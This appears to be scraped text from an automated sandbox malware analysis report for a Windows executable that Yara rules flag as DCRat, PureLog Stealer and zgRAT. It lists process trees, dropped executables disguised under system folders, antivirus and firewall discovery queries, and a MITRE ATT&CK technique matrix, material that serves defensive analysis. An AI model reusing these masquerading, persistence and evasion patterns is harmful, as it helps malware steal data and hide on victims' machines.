Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7C8.tmp" "c:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMP"	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe "C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe"

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Queries volume information: C:\Users\user\Desktop\m4n1AQRhaP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Queries volume information: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Queries volume information: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Queries volume information: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe VolumeInformation
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Queries volume information: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe VolumeInformation
Source: C:\Recovery\upfc.exe	Queries volume information: C:\Recovery\upfc.exe VolumeInformation
Source: C:\Recovery\upfc.exe	Queries volume information: C:\Recovery\upfc.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Queries volume information: C:\Windows\bcastdvr\uwTuxQS3V.exe VolumeInformation
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Queries volume information: C:\Windows\bcastdvr\uwTuxQS3V.exe VolumeInformation
Source: C:\Windows\IME\en-GB\Registry.exe	Queries volume information: C:\Windows\IME\en-GB\Registry.exe VolumeInformation
Source: C:\Windows\IME\en-GB\Registry.exe	Queries volume information: C:\Windows\IME\en-GB\Registry.exe VolumeInformation
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Queries volume information: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe VolumeInformation
Source: C:\Recovery\upfc.exe	Queries volume information: C:\Recovery\upfc.exe VolumeInformation

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1615729735.00000000012B6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: m4n1AQRhaP.exe PID: 6756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iHstGpVMr4QFhc62UUbis.exe PID: 6408, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: m4n1AQRhaP.exe, type: SAMPLE
Source: Yara match	File source: 0.0.m4n1AQRhaP.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1266049330.0000000000732000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\IME\en-GB\Registry.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\bcastdvr\uwTuxQS3V.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\upfc.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: m4n1AQRhaP.exe, type: SAMPLE
Source: Yara match	File source: 0.0.m4n1AQRhaP.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\IME\en-GB\Registry.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\bcastdvr\uwTuxQS3V.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\upfc.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1332365600.0000000012E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: m4n1AQRhaP.exe PID: 6756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iHstGpVMr4QFhc62UUbis.exe PID: 6408, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: m4n1AQRhaP.exe, type: SAMPLE
Source: Yara match	File source: 0.0.m4n1AQRhaP.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1266049330.0000000000732000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\IME\en-GB\Registry.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\bcastdvr\uwTuxQS3V.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\upfc.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: m4n1AQRhaP.exe, type: SAMPLE
Source: Yara match	File source: 0.0.m4n1AQRhaP.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Windows\IME\en-GB\Registry.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\bcastdvr\uwTuxQS3V.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\upfc.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	241 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	131 Masquerading	OS Credential Dumping	241 Security Software Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	31 Registry Run Keys / Startup Folder	31 Registry Run Keys / Startup Folder	151 Virtualization/Sandbox Evasion	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report m4n1AQRhaP.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
m4n1AQRhaP.exe